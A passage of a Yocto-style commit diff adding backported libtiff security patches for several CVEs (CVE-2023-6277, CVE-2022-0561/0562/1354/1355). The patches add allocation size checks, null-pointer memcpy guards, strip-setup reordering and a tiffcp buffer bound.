88 uint64 space;
89- uint64 filesize;
90 uint16 n;
91- filesize = TIFFGetFileSize(tif);
92 if (!(tif->tif_flags&TIFF_BIGTIFF))
93 space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
94 else
95@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
96 dircount16 = (uint16)dircount64;
97 dirsize = 20;
98 }
99+ /* Before allocating a huge amount of memory for corrupted files, check
100+ * if size of requested memory is not greater than file size. */
101+ uint64 filesize = TIFFGetFileSize(tif);
102+ uint64 allocsize = (uint64)dircount16 * dirsize;
103+ if (allocsize > filesize)
104+ {
105+ TIFFWarningExt(
106+ tif->tif_clientdata, module,
107+ "Requested memory size for TIFF directory of %" PRIu64
108+ " is greather than filesize %" PRIu64
109+ ". Memory not allocated, TIFF directory not read",
110+ allocsize, filesize);
111+ return 0;
112+ }
113 origdir = _TIFFCheckMalloc(tif, dircount16,
114 dirsize, "to read TIFF directory");
115 if (origdir == NULL)
116@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
117 "Sanity check on directory count failed, zero tag directories not supported");
118 return 0;
119 }
120+ /* Before allocating a huge amount of memory for corrupted files, check
121+ * if size of requested memory is not greater than file size. */
122+ uint64 filesize = TIFFGetFileSize(tif);
123+ uint64 allocsize = (uint64)dircount16 * dirsize;
124+ if (allocsize > filesize)
125+ {
126+ TIFFWarningExt(
127+ tif->tif_clientdata, module,
128+ "Requested memory size for TIFF directory of %" PRIu64
129+ " is greather than filesize %" PRIu64
130+ ". Memory not allocated, TIFF directory not read",
131+ allocsize, filesize);
132+ return 0;
133+ }
134 origdir = _TIFFCheckMalloc(tif, dircount16,
135 dirsize,
136 "to read TIFF directory");
137@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
138 }
139 }
140 }
141+ /* No check against filesize needed here because "dir" should have same size
142+ * than "origdir" checked above. */
143 dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
144 sizeof(TIFFDirEntry),
145 "to read TIFF directory");
146@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
147 _TIFFfree(data);
148 return(0);
149 }
150-
151+ /* Before allocating a huge amount of memory for corrupted files, check
152+ * if size of requested memory is not greater than file size. */
153+ uint64 filesize = TIFFGetFileSize(tif);
154+ uint64 allocsize = (uint64)nstrips * sizeof(uint64);
155+ if (allocsize > filesize)
156+ {
157+ TIFFWarningExt(tif->tif_clientdata, module,
158+ "Requested memory size for StripArray of %" PRIu64
159+ " is greather than filesize %" PRIu64
160+ ". Memory not allocated",
161+ allocsize, filesize);
162+ _TIFFfree(data);
163+ return (0);
164+ }
165 resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
166 if (resizeddata==0) {
167 _TIFFfree(data);
168@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
169 }
170 bytecount = last_offset + last_bytecount - offset;
171
172+ /* Before allocating a huge amount of memory for corrupted files, check if
173+ * size of StripByteCount and StripOffset tags is not greater than
174+ * file size.
175+ */
176+ uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
177+ uint64 filesize = TIFFGetFileSize(tif);
178+ if (allocsize > filesize)
179+ {
180+ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
181+ "Requested memory size for StripByteCount and "
182+ "StripOffsets %" PRIu64
183+ " is greather than filesize %" PRIu64
184+ ". Memory not allocated",
185+ allocsize, filesize);
186+ return;
187+ }
188+
189 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
190 "for chopped \"StripByteCounts\" array");
191 newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
new file mode 100644
index 0000000000..644b3fdb3f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
1[Ubuntu note: Backport of the following patch from upstream, with a few changes
2to match the current version of the file in the present Ubuntu release:
3 . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
4 . using uint64 instead of uint64_t to preserve the current code usage;
5-- Rodrigo Figueiredo Zaiden]
6
7Backport of:
8
9From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
10From: Even Rouault <even.rouault@spatialys.com>
11Date: Tue, 31 Oct 2023 19:47:22 +0100
12Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
13 RAM requests
14
15Ammends 5320c9d89c054fa805d037d84c57da874470b01a
16
17This fixes a performance regression caught by the GDAL regression test
18suite.
19
20Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
21Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
22CVE: CVE-2023-6277
23Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
24---
25 libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
26 1 file changed, 48 insertions(+), 35 deletions(-)
27
28--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
29+++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
30@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
31 datasize=(*count)*typesize;
32 assert((tmsize_t)datasize>0);
33
34- /* Before allocating a huge amount of memory for corrupted files, check if
35- * size of requested memory is not greater than file size.
36- */
37- uint64 filesize = TIFFGetFileSize(tif);
38- if (datasize > filesize)
39+ if (datasize > 100 * 1024 * 1024)
40 {
41- TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
42- "Requested memory size for tag %d (0x%x) %" PRIu32
43- " is greather than filesize %" PRIu64
44- ". Memory not allocated, tag not read",
45- direntry->tdir_tag, direntry->tdir_tag, datasize,
46- filesize);
47- return (TIFFReadDirEntryErrAlloc);
48+ /* Before allocating a huge amount of memory for corrupted files, check
49+ * if size of requested memory is not greater than file size.
50+ */
51+ const uint64 filesize = TIFFGetFileSize(tif);
52+ if (datasize > filesize)
53+ {
54+ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
55+ "Requested memory size for tag %d (0x%x) %" PRIu32
56+ " is greater than filesize %" PRIu64
57+ ". Memory not allocated, tag not read",
58+ direntry->tdir_tag, direntry->tdir_tag, datasize,
59+ filesize);
60+ return (TIFFReadDirEntryErrAlloc);
61+ }
62 }
63
64 if( isMapped(tif) && datasize > (uint32)tif->tif_size )
65@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
66 if( !_TIFFFillStrilesInternal( tif, 0 ) )
67 return -1;
68
69- /* Before allocating a huge amount of memory for corrupted files, check if
70- * size of requested memory is not greater than file size. */
71- uint64 filesize = TIFFGetFileSize(tif);
72- uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
73- if (allocsize > filesize)
74+ const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
75+ uint64 filesize = 0;
76+ if (allocsize > 100 * 1024 * 1024)
77 {
78- TIFFWarningExt(tif->tif_clientdata, module,
79- "Requested memory size for StripByteCounts of %" PRIu64
80- " is greather than filesize %" PRIu64
81- ". Memory not allocated",
82- allocsize, filesize);
83- return -1;
84+ /* Before allocating a huge amount of memory for corrupted files, check
85+ * if size of requested memory is not greater than file size. */
86+ filesize = TIFFGetFileSize(tif);
87+ if (allocsize > filesize)
88+ {
89+ TIFFWarningExt(
90+ tif->tif_clientdata, module,
91+ "Requested memory size for StripByteCounts of %" PRIu64
92+ " is greater than filesize %" PRIu64 ". Memory not allocated",
93+ allocsize, filesize);
94+ return -1;
95+ }
96 }
97
98 if (td->td_stripbytecount_p)
99@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
100 return -1;
101 space+=datasize;
102 }
103+ if (filesize == 0)
104+ filesize = TIFFGetFileSize(tif);
105 if( filesize < space )
106- /* we should perhaps return in error ? */
107- space = filesize;
108- else
109- space = filesize - space;
110+ /* we should perhaps return in error ? */
111+ space = filesize;
112+ else
113+ space = filesize - space;
114 if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
115 space /= td->td_samplesperpixel;
116 for (strip = 0; strip < td->td_nstrips; strip++)
117@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
118 dircount16 = (uint16)dircount64;
119 dirsize = 20;
120 }
121- /* Before allocating a huge amount of memory for corrupted files, check
122- * if size of requested memory is not greater than file size. */
123- uint64 filesize = TIFFGetFileSize(tif);
124- uint64 allocsize = (uint64)dircount16 * dirsize;
125- if (allocsize > filesize)
126+ const uint64 allocsize = (uint64)dircount16 * dirsize;
127+ if (allocsize > 100 * 1024 * 1024)
128 {
129- TIFFWarningExt(
130- tif->tif_clientdata, module,
131- "Requested memory size for TIFF directory of %" PRIu64
132- " is greather than filesize %" PRIu64
133- ". Memory not allocated, TIFF directory not read",
134- allocsize, filesize);
135- return 0;
136+ /* Before allocating a huge amount of memory for corrupted files,
137+ * check if size of requested memory is not greater than file size.
138+ */
139+ const uint64 filesize = TIFFGetFileSize(tif);
140+ if (allocsize > filesize)
141+ {
142+ TIFFWarningExt(
143+ tif->tif_clientdata, module,
144+ "Requested memory size for TIFF directory of %" PRIu64
145+ " is greater than filesize %" PRIu64
146+ ". Memory not allocated, TIFF directory not read",
147+ allocsize, filesize);
148+ return 0;
149+ }
150 }
151 origdir = _TIFFCheckMalloc(tif, dircount16,
152 dirsize, "to read TIFF directory");
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
new file mode 100644
index 0000000000..ed7d7e7b96
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
1Backport of:
2
3From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
4From: Even Rouault <even.rouault@spatialys.com>
5Date: Tue, 31 Oct 2023 20:13:45 +0100
6Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
7 check
8
9CoverityScan rightly points that the max value for dircount16 * dirsize
10is 4096 * 20. That's small enough not to do any check
11
12Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
13Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
14CVE: CVE-2023-6277
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 libtiff/tif_dirread.c | 18 ------------------
18 1 file changed, 18 deletions(-)
19
20--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
21+++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
22@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
23 dircount16 = (uint16)dircount64;
24 dirsize = 20;
25 }
26- const uint64 allocsize = (uint64)dircount16 * dirsize;
27- if (allocsize > 100 * 1024 * 1024)
28- {
29- /* Before allocating a huge amount of memory for corrupted files,
30- * check if size of requested memory is not greater than file size.
31- */
32- const uint64 filesize = TIFFGetFileSize(tif);
33- if (allocsize > filesize)
34- {
35- TIFFWarningExt(
36- tif->tif_clientdata, module,
37- "Requested memory size for TIFF directory of %" PRIu64
38- " is greater than filesize %" PRIu64
39- ". Memory not allocated, TIFF directory not read",
40- allocsize, filesize);
41- return 0;
42- }
43- }
44 origdir = _TIFFCheckMalloc(tif, dircount16,
45 dirsize, "to read TIFF directory");
46 if (origdir == NULL)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
new file mode 100644
index 0000000000..1a43fd3230
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
1[Ubuntu note: Backport of the following patch from upstream, with a few changes
2to match the current version of the file in the present Ubuntu release:
3 . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
4 . using uint64 instead of uint64_t to preserve the current code usage;
5 . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
6-- Rodrigo Figueiredo Zaiden]
7
8Backport of:
9
10From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
11From: Even Rouault <even.rouault@spatialys.com>
12Date: Tue, 31 Oct 2023 21:30:58 +0100
13Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
14 RAM requests
15
16Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
17Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
18CVE: CVE-2023-6277
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
22 1 file changed, 31 insertions(+), 23 deletions(-)
23
24--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
25+++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
26@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
27 _TIFFfree(data);
28 return(0);
29 }
30- /* Before allocating a huge amount of memory for corrupted files, check
31- * if size of requested memory is not greater than file size. */
32- uint64 filesize = TIFFGetFileSize(tif);
33- uint64 allocsize = (uint64)nstrips * sizeof(uint64);
34- if (allocsize > filesize)
35+ const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
36+ if (allocsize > 100 * 1024 * 1024)
37 {
38- TIFFWarningExt(tif->tif_clientdata, module,
39- "Requested memory size for StripArray of %" PRIu64
40- " is greather than filesize %" PRIu64
41- ". Memory not allocated",
42- allocsize, filesize);
43- _TIFFfree(data);
44- return (0);
45+ /* Before allocating a huge amount of memory for corrupted files,
46+ * check if size of requested memory is not greater than file size.
47+ */
48+ const uint64 filesize = TIFFGetFileSize(tif);
49+ if (allocsize > filesize)
50+ {
51+ TIFFWarningExt(
52+ tif->tif_clientdata, module,
53+ "Requested memory size for StripArray of %" PRIu64
54+ " is greater than filesize %" PRIu64
55+ ". Memory not allocated",
56+ allocsize, filesize);
57+ _TIFFfree(data);
58+ return (0);
59+ }
60 }
61 resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
62 if (resizeddata==0) {
63@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
64 * size of StripByteCount and StripOffset tags is not greater than
65 * file size.
66 */
67- uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
68- uint64 filesize = TIFFGetFileSize(tif);
69- if (allocsize > filesize)
70- {
71- TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
72- "Requested memory size for StripByteCount and "
73- "StripOffsets %" PRIu64
74- " is greather than filesize %" PRIu64
75- ". Memory not allocated",
76- allocsize, filesize);
77- return;
78+ const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
79+ if (allocsize > 100 * 1024 * 1024)
80+ {
81+ const uint64 filesize = TIFFGetFileSize(tif);
82+ if (allocsize > filesize)
83+ {
84+ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
85+ "Requested memory size for StripByteCount and "
86+ "StripOffsets %" PRIu64
87+ " is greater than filesize %" PRIu64
88+ ". Memory not allocated",
89+ allocsize, filesize);
90+ return;
91+ }
92 }
93
94 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
new file mode 100644
index 0000000000..01ed5dcd24
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
1From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Sat, 5 Feb 2022 20:36:41 +0100
4Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
5 source pointer and size of zero (fixes #362)
6
7Upstream-Status: Backport
8CVE: CVE-2022-0562
9Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
10Comment: Refreshed patch
11---
12 libtiff/tif_dirread.c | 3 ++-
13 1 file changed, 2 insertions(+), 1 deletion(-)
14
15diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
16index 2bbc4585..23194ced 100644
17--- a/libtiff/tif_dirread.c
18+++ b/libtiff/tif_dirread.c
19@@ -4126,7 +4126,8 @@
20 goto bad;
21 }
22
23- memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
24+ if (old_extrasamples > 0)
25+ memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
26 _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
27 _TIFFfree(new_sampleinfo);
28 }
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
1From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Sun, 5 Dec 2021 14:37:46 +0100
4Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
5
6to avoid having the size of the strip arrays inconsistent with the
7number of strips returned by TIFFNumberOfStrips(), which may cause
8out-ouf-bounds array read afterwards.
9
10One of the OJPEG hack that alters SamplesPerPixel may influence the
11number of strips. Hence compute tif_dir.td_nstrips only afterwards.
12
13CVE: CVE-2022-1354
14
15Upstream-Status: Backport
16[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
17
18Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
19---
20 libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
21 1 file changed, 83 insertions(+), 79 deletions(-)
22
23diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
24index 8f434ef5..14c031d1 100644
25--- a/libtiff/tif_dirread.c
26+++ b/libtiff/tif_dirread.c
27@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
28 MissingRequired(tif,"ImageLength");
29 goto bad;
30 }
31- /*
32- * Setup appropriate structures (by strip or by tile)
33- */
34- if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
35- tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
36- tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
37- tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
38- tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
39- tif->tif_flags &= ~TIFF_ISTILED;
40- } else {
41- tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
42- tif->tif_flags |= TIFF_ISTILED;
43- }
44- if (!tif->tif_dir.td_nstrips) {
45- TIFFErrorExt(tif->tif_clientdata, module,
46- "Cannot handle zero number of %s",
47- isTiled(tif) ? "tiles" : "strips");
48- goto bad;
49- }
50- tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
51- if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
52- tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
53- if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
54-#ifdef OJPEG_SUPPORT
55- if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
56- (isTiled(tif)==0) &&
57- (tif->tif_dir.td_nstrips==1)) {
58- /*
59- * XXX: OJPEG hack.
60- * If a) compression is OJPEG, b) it's not a tiled TIFF,
61- * and c) the number of strips is 1,
62- * then we tolerate the absence of stripoffsets tag,
63- * because, presumably, all required data is in the
64- * JpegInterchangeFormat stream.
65- */
66- TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
67- } else
68-#endif
69- {
70- MissingRequired(tif,
71- isTiled(tif) ? "TileOffsets" : "StripOffsets");
72- goto bad;
73- }
74- }
75+
76 /*
77 * Second pass: extract other information.
78 */
79@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
80 } /* -- if (!dp->tdir_ignore) */
81 } /* -- for-loop -- */
82
83- if( tif->tif_mode == O_RDWR &&
84- tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
85- tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
86- tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
87- tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
88- tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
89- tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
90- tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
91- tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
92- {
93- /* Directory typically created with TIFFDeferStrileArrayWriting() */
94- TIFFSetupStrips(tif);
95- }
96- else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
97- {
98- if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
99- {
100- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
101- tif->tif_dir.td_nstrips,
102- &tif->tif_dir.td_stripoffset_p))
103- {
104- goto bad;
105- }
106- }
107- if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
108- {
109- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
110- tif->tif_dir.td_nstrips,
111- &tif->tif_dir.td_stripbytecount_p))
112- {
113- goto bad;
114- }
115- }
116- }
117-
118 /*
119 * OJPEG hack:
120 * - If a) compression is OJPEG, and b) photometric tag is missing,
121@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
122 }
123 }
124
125+ /*
126+ * Setup appropriate structures (by strip or by tile)
127+ * We do that only after the above OJPEG hack which alters SamplesPerPixel
128+ * and thus influences the number of strips in the separate planarconfig.
129+ */
130+ if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
131+ tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
132+ tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
133+ tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
134+ tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
135+ tif->tif_flags &= ~TIFF_ISTILED;
136+ } else {
137+ tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
138+ tif->tif_flags |= TIFF_ISTILED;
139+ }
140+ if (!tif->tif_dir.td_nstrips) {
141+ TIFFErrorExt(tif->tif_clientdata, module,
142+ "Cannot handle zero number of %s",
143+ isTiled(tif) ? "tiles" : "strips");
144+ goto bad;
145+ }
146+ tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
147+ if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
148+ tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
149+ if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
150+#ifdef OJPEG_SUPPORT
151+ if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
152+ (isTiled(tif)==0) &&
153+ (tif->tif_dir.td_nstrips==1)) {
154+ /*
155+ * XXX: OJPEG hack.
156+ * If a) compression is OJPEG, b) it's not a tiled TIFF,
157+ * and c) the number of strips is 1,
158+ * then we tolerate the absence of stripoffsets tag,
159+ * because, presumably, all required data is in the
160+ * JpegInterchangeFormat stream.
161+ */
162+ TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
163+ } else
164+#endif
165+ {
166+ MissingRequired(tif,
167+ isTiled(tif) ? "TileOffsets" : "StripOffsets");
168+ goto bad;
169+ }
170+ }
171+
172+ if( tif->tif_mode == O_RDWR &&
173+ tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
174+ tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
175+ tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
176+ tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
177+ tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
178+ tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
179+ tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
180+ tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
181+ {
182+ /* Directory typically created with TIFFDeferStrileArrayWriting() */
183+ TIFFSetupStrips(tif);
184+ }
185+ else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
186+ {
187+ if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
188+ {
189+ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
190+ tif->tif_dir.td_nstrips,
191+ &tif->tif_dir.td_stripoffset_p))
192+ {
193+ goto bad;
194+ }
195+ }
196+ if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
197+ {
198+ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
199+ tif->tif_dir.td_nstrips,
200+ &tif->tif_dir.td_stripbytecount_p))
201+ {
202+ goto bad;
203+ }
204+ }
205+ }
206+
207 /*
208 * Make sure all non-color channels are extrasamples.
209 * If it's not the case, define them as such.
210--
2112.25.1
212
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
1From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Sat, 2 Apr 2022 22:33:31 +0200
4Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
5
6CVE: CVE-2022-1355
7
8Upstream-Status: Backport
9[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
10
11Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
12---
13 tools/tiffcp.c | 25 ++++++++++++++++++++-----
14 1 file changed, 20 insertions(+), 5 deletions(-)
15
16diff --git a/tools/tiffcp.c b/tools/tiffcp.c
17index fd129bb7..8d944ff6 100644
18--- a/tools/tiffcp.c
19+++ b/tools/tiffcp.c
20@@ -274,19 +274,34 @@ main(int argc, char* argv[])
21 deftilewidth = atoi(optarg);
22 break;
23 case 'B':
24- *mp++ = 'b'; *mp = '\0';
25+ if (strlen(mode) < (sizeof(mode) - 1))
26+ {
27+ *mp++ = 'b'; *mp = '\0';
28+ }
29 break;
30 case 'L':
31- *mp++ = 'l'; *mp = '\0';
32+ if (strlen(mode) < (sizeof(mode) - 1))
33+ {
34+ *mp++ = 'l'; *mp = '\0';
35+ }
36 break;
37 case 'M':
38- *mp++ = 'm'; *mp = '\0';
39+ if (strlen(mode) < (sizeof(mode) - 1))
40+ {
41+ *mp++ = 'm'; *mp = '\0';
42+ }
43 break;
44 case 'C':
45- *mp++ = 'c'; *mp = '\0';
46+ if (strlen(mode) < (sizeof(mode) - 1))
47+ {
48+ *mp++ = 'c'; *mp = '\0';
49+ }
50 break;
51 case '8':
52- *mp++ = '8'; *mp = '\0';
53+ if (strlen(mode) < (sizeof(mode)-1))
54+ {
55+ *mp++ = '8'; *mp = '\0';
56+ }
57 break;
58 case 'x':
59 pageInSeq = 1;
60--
612.25.1
62
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
1From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Sun, 6 Feb 2022 13:08:38 +0100
4Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
5 source pointer and size of zero (fixes #362)
6
7Upstream-Status: Backport
8CVE: CVE-2022-0561
9Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
10Comment: Refreshed patch
11---
12 libtiff/tif_dirread.c | 5 +++--
13 1 file changed, 3 insertions(+), 2 deletions(-)
14
15diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
16index 23194ced..50ebf8ac 100644
17--- a/libtiff/tif_dirread.c
18+++ b/libtiff/tif_dirread.c
19@@ -5683,8 +5682,9 @@
